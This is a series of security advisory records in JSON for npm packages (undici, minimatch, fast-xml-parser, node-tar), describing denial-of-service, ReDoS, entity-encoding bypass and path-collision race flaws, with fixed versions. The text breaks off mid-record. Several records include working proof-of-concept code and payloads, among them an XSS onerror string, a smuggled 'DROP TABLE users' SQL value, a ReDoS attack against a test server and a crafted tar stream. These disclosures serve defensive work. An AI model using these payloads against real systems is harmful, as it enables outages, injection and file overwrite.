{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1526"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-409"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:41:56Z",
    "nvd_published_at": "2026-03-12T21:16:23Z",
    "severity": "HIGH"
  },
  "details": "## Description\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a \"decompression bomb\") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.\n\nThe vulnerability exists in the `PerMessageDeflate.decompress()` method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.\n\n## Impact\n\n- Remote denial of service against any Node.js application using undici\u0027s WebSocket client\n- A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more\n- Memory exhaustion occurs in native/external memory, bypassing V8 heap limits\n- No application-level mitigation is possible as decompression occurs before message delivery\n\n### Patches\n\nUsers should upgrade to fixed versions.\n\n### Workarounds\n\nNo workaround are possible.",
  "id": "GHSA-vrm6-8vpv-qv8q",
  "modified": "2026-03-13T20:41:56Z",
  "published": "2026-03-13T20:41:56Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3481206"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "WEB",
      "url": "https://datatracker.ietf.org/doc/html/rfc7692"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    },
    {
      "type": "WEB",
      "url": "https://owasp.org/www-community/attacks/Denial_of_Service"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0"
            },
            {
              "fixed": "10.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "8.0.0"
            },
            {
              "fixed": "8.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.0.0"
            },
            {
              "fixed": "7.4.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "minimatch"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27904"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-26T22:07:15Z",
    "nvd_published_at": "2026-02-26T02:16:21Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nNested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally.\n\n---\n\n### Details\n\nThe root cause is in `AST.toRegExpSource()` at [`src/ast.ts#L598`](https://github.com/isaacs/minimatch/blob/v10.2.2/src/ast.ts#L598). For the `*` extglob type, the close token emitted is `)*` or `)?`, wrapping the recursive body in `(?:...)*`. When extglobs are nested, each level adds another `*` quantifier around the previous group:\n\n```typescript\n: this.type === \u0027*\u0027 \u0026\u0026 bodyDotAllowed ? `)?`\n: `)${this.type}`\n```\n\nThis produces the following regexps:\n\n| Pattern              | Generated regex                          |\n|----------------------|------------------------------------------|\n| `*(a\\|b)`            | `/^(?:a\\|b)*$/`                          |\n| `*(*(a\\|b))`         | `/^(?:(?:a\\|b)*)*$/`                     |\n| `*(*(*(a\\|b)))`      | `/^(?:(?:(?:a\\|b)*)*)*$/`               |\n| `*(*(*(*(a\\|b))))` | `/^(?:(?:(?:(?:a\\|b)*)*)*)*$/`          |\n\nThese are textbook nested-quantifier patterns. Against an input of repeated `a` characters followed by a non-matching character `z`, V8\u0027s backtracking engine explores an exponential number of paths before returning `false`.\n\nThe generated regex is stored on `this.set` and evaluated inside `matchOne()` at [`src/index.ts#L1010`](https://github.com/isaacs/minimatch/blob/v10.2.2/src/index.ts#L1010) via `p.test(f)`. It is reached through the standard `minimatch()` call with no configuration.\n\nMeasured times via `minimatch()`:\n\n| Pattern              | Input              | Time       |\n|----------------------|--------------------|------------|\n| `*(*(a\\|b))`         | `a` x30 + `z`      | ~68,000ms  |\n| `*(*(*(a\\|b)))`      | `a` x20 + `z`      | ~124,000ms |\n| `*(*(*(*(a\\|b))))` | `a` x25 + `z`      | ~116,000ms |\n| `*(a\\|a)`            | `a` x25 + `z`      | ~2,000ms   |\n\nDepth inflection at fixed input `a` x16 + `z`:\n\n| Depth | Pattern              | Time         |\n|-------|----------------------|--------------|\n| 1     | `*(a\\|b)`            | 0ms          |\n| 2     | `*(*(a\\|b))`         | 4ms          |\n| 3     | `*(*(*(a\\|b)))`      | 270ms        |\n| 4     | `*(*(*(*(a\\|b))))` | 115,000ms    |\n\nGoing from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.\n\n---\n\n### PoC\n\nTested on minimatch@10.2.2, Node.js 20.\n\n**Step 1 -- verify the generated regexps and timing (standalone script)**\n\nSave as `poc4-validate.mjs` and run with `node poc4-validate.mjs`:\n\n```javascript\nimport { minimatch, Minimatch } from \u0027minimatch\u0027\n\nfunction timed(fn) {\n  const s = process.hrtime.bigint()\n  let result, error\n  try { result = fn() } catch(e) { error = e }\n  const ms = Number(process.hrtime.bigint() - s) / 1e6\n  return { ms, result, error }\n}\n\n// Verify generated regexps\nfor (let depth = 1; depth \u003c= 4; depth++) {\n  let pat = \u0027a|b\u0027\n  for (let i = 0; i \u003c depth; i++) pat = `*(${pat})`\n  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()\n  console.log(`depth=${depth} \"${pat}\" -\u003e ${re}`)\n}\n// depth=1 \"*(a|b)\"          -\u003e /^(?:a|b)*$/\n// depth=2 \"*(*(a|b))\"       -\u003e /^(?:(?:a|b)*)*$/\n// depth=3 \"*(*(*(a|b)))\"    -\u003e /^(?:(?:(?:a|b)*)*)*$/\n// depth=4 \"*(*(*(*(a|b))))\" -\u003e /^(?:(?:(?:(?:a|b)*)*)*)*$/\n\n// Safe-length timing (exponential growth confirmation without multi-minute hang)\nconst cases = [\n  [\u0027*(*(*(a|b)))\u0027, 15],   // ~270ms\n  [\u0027*(*(*(a|b)))\u0027, 17],   // ~800ms\n  [\u0027*(*(*(a|b)))\u0027, 19],   // ~2400ms\n  [\u0027*(*(a|b))\u0027,    23],   // ~260ms\n  [\u0027*(a|b)\u0027,      101],   // \u003c5ms (depth=1 control)\n]\nfor (const [pat, n] of cases) {\n  const t = timed(() =\u003e minimatch(\u0027a\u0027.repeat(n) + \u0027z\u0027, pat))\n  console.log(`\"${pat}\" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)\n}\n\n// Confirm noext disables the vulnerability\nconst t_noext = timed(() =\u003e minimatch(\u0027a\u0027.repeat(18) + \u0027z\u0027, \u0027*(*(*(a|b)))\u0027, { noext: true }))\nconsole.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)\n\n// +() is equally affected\nconst t_plus = timed(() =\u003e minimatch(\u0027a\u0027.repeat(17) + \u0027z\u0027, \u0027+(+(+(a|b)))\u0027))\nconsole.log(`\"+(+(+(a|b)))\" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)\n```\n\nObserved output:\n```\ndepth=1 \"*(a|b)\"          -\u003e /^(?:a|b)*$/\ndepth=2 \"*(*(a|b))\"       -\u003e /^(?:(?:a|b)*)*$/\ndepth=3 \"*(*(*(a|b)))\"    -\u003e /^(?:(?:(?:a|b)*)*)*$/\ndepth=4 \"*(*(*(*(a|b))))\" -\u003e /^(?:(?:(?:(?:a|b)*)*)*)*$/\n\"*(*(*(a|b)))\" n=15: 269ms result=false\n\"*(*(*(a|b)))\" n=17: 268ms result=false\n\"*(*(*(a|b)))\" n=19: 2408ms result=false\n\"*(*(a|b))\"    n=23: 257ms result=false\n\"*(a|b)\"       n=101: 0ms result=false\nnoext=true: 0ms (should be ~0ms)\n\"+(+(+(a|b)))\" n=18: 6300ms result=false\n```\n\n**Step 2 -- HTTP server (event loop starvation proof)**\n\nSave as `poc4-server.mjs`:\n\n```javascript\nimport http from \u0027node:http\u0027\nimport { URL } from \u0027node:url\u0027\nimport { minimatch } from \u0027minimatch\u0027\n\nconst PORT = 3001\nhttp.createServer((req, res) =\u003e {\n  const url     = new URL(req.url, `http://localhost:${PORT}`)\n  const pattern = url.searchParams.get(\u0027pattern\u0027) ?? \u0027\u0027\n  const path    = url.searchParams.get(\u0027path\u0027) ?? \u0027\u0027\n\n  const start  = process.hrtime.bigint()\n  const result = minimatch(path, pattern)\n  const ms     = Number(process.hrtime.bigint() - start) / 1e6\n\n  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern=\"${pattern}\" path=\"${path.slice(0,30)}\"`)\n  res.writeHead(200, { \u0027Content-Type\u0027: \u0027application/json\u0027 })\n  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + \u0027\\n\u0027)\n}).listen(PORT, () =\u003e console.log(`listening on ${PORT}`))\n```\n\nTerminal 1 -- start the server:\n```\nnode poc4-server.mjs\n```\n\nTerminal 2 -- fire the attack (depth=3, 19 a\u0027s + z) and return immediately:\n```\ncurl \"http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29\u0026path=aaaaaaaaaaaaaaaaaaaz\" \u0026\n```\n\nTerminal 3 -- send a benign request while the attack is in-flight:\n```\ncurl -w \"\\ntime_total: %{time_total}s\\n\" \"http://localhost:3001/match?pattern=*%28a%7Cb%29\u0026path=aaaz\"\n```\n\n**Observed output -- Terminal 2 (attack):**\n```\n{\"result\":false,\"ms\":\"64149\"}\n```\n\n**Observed output -- Terminal 3 (benign, concurrent):**\n```\n{\"result\":false,\"ms\":\"0\"}\n\ntime_total: 63.022047s\n```\n\n**Terminal 1 (server log):**\n```\n[2026-02-20T09:41:17.624Z] pattern=\"*(*(*(a|b)))\" path=\"aaaaaaaaaaaaaaaaaaaz\"\n[2026-02-20T09:42:21.775Z] done in 64149ms result=false\n[2026-02-20T09:42:21.779Z] pattern=\"*(a|b)\" path=\"aaaz\"\n[2026-02-20T09:42:21.779Z] done in 0ms result=false\n```\n\nThe server reports `\"ms\":\"0\"` for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second `time_total` is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.\n\nNote: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8\u0027s JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.\n\n---\n\n### Impact\n\nAny context where an attacker can influence the glob pattern passed to `minimatch()` is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.\n\nDepth 3 (`*(*(*(a|b)))`, 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (`*(*(a|b))`, 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.\n\n`+()` extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).\n\n**Mitigation available:** passing `{ noext: true }` to `minimatch()` disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.",
  "id": "GHSA-23c5-xmqv-rm74",
  "modified": "2026-02-26T22:07:15Z",
  "published": "2026-02-26T22:07:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/minimatch"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.3.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.1.3"
            },
            {
              "fixed": "4.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25896"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-185"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-20T18:23:54Z",
    "nvd_published_at": "2026-02-20T21:19:27Z",
    "severity": "CRITICAL"
  },
  "details": "# Entity encoding bypass via regex injection in DOCTYPE entity names\n\n## Summary\n\nA dot (`.`) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (`\u0026lt;`, `\u0026gt;`, `\u0026amp;`, `\u0026quot;`, `\u0026apos;`) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.\n\n## Details\n\nThe fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed `.` (period), which is valid in XML names per the W3C spec.\n\nIn `DocTypeReader.js`, entity names are passed directly to `RegExp()`:\n\n```js\nentities[entityName] = {\n    regx: RegExp(`\u0026${entityName};`, \"g\"),\n    val: val\n};\n```\n\nAn entity named `l.` produces the regex `/\u0026l.;/g` where `.` matches **any character**, including the `t` in `\u0026lt;`. Since DOCTYPE entities are replaced before built-in entities, this shadows `\u0026lt;` entirely.\n\nThe same issue exists in `OrderedObjParser.js:81` (`addExternalEntities`), and in the v6 codebase - `EntitiesParser.js` has a `validateEntityName` function with a character blacklist, but `.` is not included:\n\n```js\n// v6 EntitiesParser.js line 96\nconst specialChar = \"!?\\\\/[]$%{}^\u0026*()\u003c\u003e|+\";  // no dot\n```\n\n## Shadowing all 5 built-in entities\n\n| Entity name | Regex created | Shadows |\n|---|---|---|\n| `l.` | `/\u0026l.;/g` | `\u0026lt;` |\n| `g.` | `/\u0026g.;/g` | `\u0026gt;` |\n| `am.` | `/\u0026am.;/g` | `\u0026amp;` |\n| `quo.` | `/\u0026quo.;/g` | `\u0026quot;` |\n| `apo.` | `/\u0026apo.;/g` | `\u0026apos;` |\n\n## PoC\n\n```js\nconst { XMLParser } = require(\"fast-xml-parser\");\n\nconst xml = `\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE foo [\n  \u003c!ENTITY l. \"\u003cimg src=x onerror=alert(1)\u003e\"\u003e\n]\u003e\n\u003croot\u003e\n  \u003ctext\u003eHello \u0026lt;b\u0026gt;World\u0026lt;/b\u0026gt;\u003c/text\u003e\n\u003c/root\u003e`;\n\nconst result = new XMLParser().parse(xml);\nconsole.log(result.root.text);\n// Hello \u003cimg src=x onerror=alert(1)\u003eb\u003eWorld\u003cimg src=x onerror=alert(1)\u003e/b\u003e\n```\n\nNo special parser options needed - `processEntities: true` is the default.\n\nWhen an app renders `result.root.text` in a page (e.g. `innerHTML`, template interpolation, SSR), the injected `\u003cimg onerror\u003e` fires.\n\n`\u0026amp;` can be shadowed too:\n\n```js\nconst xml2 = `\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE foo [\n  \u003c!ENTITY am. \"\u0027; DROP TABLE users;--\"\u003e\n]\u003e\n\u003croot\u003eSELECT * FROM t WHERE name=\u0027O\u0026amp;Brien\u0027\u003c/root\u003e`;\n\nconst r = new XMLParser().parse(xml2);\nconsole.log(r.root);\n// SELECT * FROM t WHERE name=\u0027O\u0027; DROP TABLE users;--Brien\u0027\n```\n\n## Impact\n\nThis is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.\n\n- Default config, no special options\n- Attacker can replace any `\u0026lt;` / `\u0026gt;` / `\u0026amp;` / `\u0026quot;` / `\u0026apos;` with arbitrary strings\n- Direct XSS vector when parsed XML content is rendered in a page\n- v5 and v6 both affected\n\n## Suggested fix\n\nEscape regex metacharacters before constructing the replacement regex:\n\n```js\nconst escaped = entityName.replace(/[.*+?^${}()|[\\]\\\\]/g, \u0027\\\\$\u0026\u0027);\nentities[entityName] = {\n    regx: RegExp(`\u0026${escaped};`, \"g\"),\n    val: val\n};\n```\n\nFor v6, add `.` to the blacklist in `validateEntityName`:\n\n```js\nconst specialChar = \"!?\\\\/[].{}^\u0026*()\u003c\u003e|+\";\n```\n\n## Severity\n\n**CWE-185** (Incorrect Regular Expression)\n\n**CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)**\n\nEntity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.",
  "id": "GHSA-m7jm-9gc2-mpf2",
  "modified": "2026-02-27T16:51:58Z",
  "published": "2026-02-20T18:23:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names"
}

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.5.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23950"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-176",
      "CWE-367"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-21T01:05:49Z",
    "nvd_published_at": "2026-01-20T01:15:57Z",
    "severity": "HIGH"
  },
  "details": "**TITLE**: Race Condition in node-tar Path Reservations via Unicode Sharp-S (\u00df) Collisions on macOS APFS\n\n**AUTHOR**: Tom\u00e1s Illuminati\n\n### Details\n\nA race condition vulnerability exists in `node-tar` (v7.5.3) this is to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `\u00df` and `ss`), allowing them to be processed in parallel. This bypasses the library\u0027s internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently.\n\n```typescript\n// node-tar/src/path-reservations.ts (Lines 53-62)\nreserve(paths: string[], fn: Handler) {\n    paths =\n      isWindows ?\n        [\u0027win32 parallelization disabled\u0027]\n      : paths.map(p =\u003e {\n          return stripTrailingSlashes(\n            join(normalizeUnicode(p)), // \u003c- THE PROBLEM FOR MacOS FS\n          ).toLowerCase()\n        })\n\n```\n\nIn MacOS the ```join(normalizeUnicode(p)), ``` FS confuses \u00df with ss, but this code does not. For example:\n\n``````bash\nbash-3.2$ printf \"CONTENT_SS\\n\" \u003e collision_test_ss\nbash-3.2$ ls\ncollision_test_ss\nbash-3.2$ printf \"CONTENT_ESSZETT\\n\" \u003e collision_test_\u00df\nbash-3.2$ ls -la\ntotal 8\ndrwxr-xr-x   3 testuser  staff    96 Jan 19 01:25 .\ndrwxr-x---+ 82 testuser  staff  2624 Jan 19 01:25 ..\n-rw-r--r--   1 testuser  staff    16 Jan 19 01:26 collision_test_ss\nbash-3.2$ \n``````\n\n---\n\n### PoC\n\n``````javascript\nconst tar = require(\u0027tar\u0027);\nconst fs = require(\u0027fs\u0027);\nconst path = require(\u0027path\u0027);\nconst { PassThrough } = require(\u0027stream\u0027);\n\nconst exploitDir = path.resolve(\u0027race_exploit_dir\u0027);\nif (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });\nfs.mkdirSync(exploitDir);\n\nconsole.log(\u0027[*] Testing...\u0027);\nconsole.log(`[*] Extraction target: ${exploitDir}`);\n\n// Construct stream\nconst stream = new PassThrough();\n\nconst contentA = \u0027A\u0027.repeat(1000);\nconst contentB = \u0027B\u0027.repeat(1000);\n\n// Key 1: \"f_ss\"\nconst header1 = new tar.Header({\n    path: \u0027collision_ss\u0027,\n    mode: 0o644,\n    size: contentA.length,\n});\nheader1.encode();\n\n// Key 2: \"f_\u00df\"\nconst header2 = new tar.Header({\n    path: \u0027collision_\u00df\u0027,\n    mode: 0o644,\n    size: contentB.length,\n});\nheader2.encode();\n\n// Write to stream\nstream.write(header1.block);\nstream.write(contentA);\nstream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding\n\nstream.write(header2.block);\nstream.write(contentB);\nstream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding\n\n// End\nstream.write(Buffer.alloc(1024));\nstream.end();\n\n// Extract\nconst extract = new tar.Unpack({\n    cwd: exploitDir,\n    // Ensure jobs is high enough to allow parallel processing if locks fail\n    jobs: 8 \n});\n\nstream.pipe(extract);\n\nextract.on(\u0027end\u0027, () =\u003e {\n    console.log(\u0027[*] Extraction complete\u0027);\n\n    // Check what exists\n    const files = fs.readdirSync(exploitDir);\n    console.log(\u0027[*] Files in exploit dir:\u0027, files);\n    files.forEach(f =\u003e {\n        const p = path.join(exploitDir, f);\n        const stat = fs.statSync(p);\n        const content = fs.readFileSync(p, \u0027utf8\u0027);\n        console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);\n    });\n\n    if (files.length === 1 || (files.length === 2 \u0026\u0026 fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {\n        console.log(\u0027\\[*] GOOD\u0027);\n    } else {\n        console.log(\u0027[-] No collision\u0027);\n    }\n});\n\n``````\n\n---\n\n### Impact\nThis is a **Race Condition** which enables **Arbitrary File Overwrite**. This vulnerability affects users and systems using **node-tar on macOS (APFS/HFS+)**. Because of using `NFD` Unicode normalization (in which `\u00df` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `\u00df` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive.\n\n---\n\n### Remediation\n\nUpdate `path-reservations.js` to use a normalization form that matches the target filesystem\u0027s behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase(\u0027en\u0027)` and then `toLocaleUpperCase(\u0027en\u0027)`.\n\nUsers who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.\n\n---",
  "id": "GHSA-r6q2-hw4h-h46w",
  "modified": "2026-03-16T14:23:26Z",
  "published": "2026-01-21T01:05:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23950"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/node-tar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Race Condition in node-tar Path Reservations via Unicode Ligature Collisions on macOS APFS"
}

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.1.3"
            },
            {
              "fixed": "4.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.3.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-26278"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-776"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-17T21:30:10Z",
    "nvd_published_at": "2026-02-19T20:25:43Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it\u2019s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application.\n\n### Details\nThere is a check in `DocTypeReader.js` that tries to prevent entity expansion attacks by rejecting entities that reference other entities (it looks for \u0026 inside entity values). This does stop classic \u201cBillion Laughs\u201d payloads.\n\nHowever, it doesn\u2019t stop a much simpler variant.\n\nIf you define one large entity that contains only raw text (no \u0026 characters) and then reference it many times, the parser will happily expand it every time. There is no limit on how large the expanded result can become, or how many replacements are allowed.\n\nThe problem is in `replaceEntitiesValue()` inside `OrderedObjParser.js`. It repeatedly runs `val.replace()` in a loop, without any checks on total output size or execution cost. As the entity grows or the number of references increases, parsing time explodes.\n\nRelevant code:\n\n`DocTypeReader.js` (lines 28\u201333): entity registration only checks for \u0026\n\n`OrderedObjParser.js` (lines 439\u2013458): entity replacement loop with no limits\n\n### PoC\n\n```js\nconst { XMLParser } = require(\u0027fast-xml-parser\u0027);\n\nconst entity = \u0027A\u0027.repeat(1000);\nconst refs = \u0027\u0026big;\u0027.repeat(100);\nconst xml = `\u003c!DOCTYPE foo [\u003c!ENTITY big \"${entity}\"\u003e]\u003e\u003croot\u003e${refs}\u003c/root\u003e`;\n\nconsole.time(\u0027parse\u0027);\nnew XMLParser().parse(xml); // ~4\u20138 seconds for 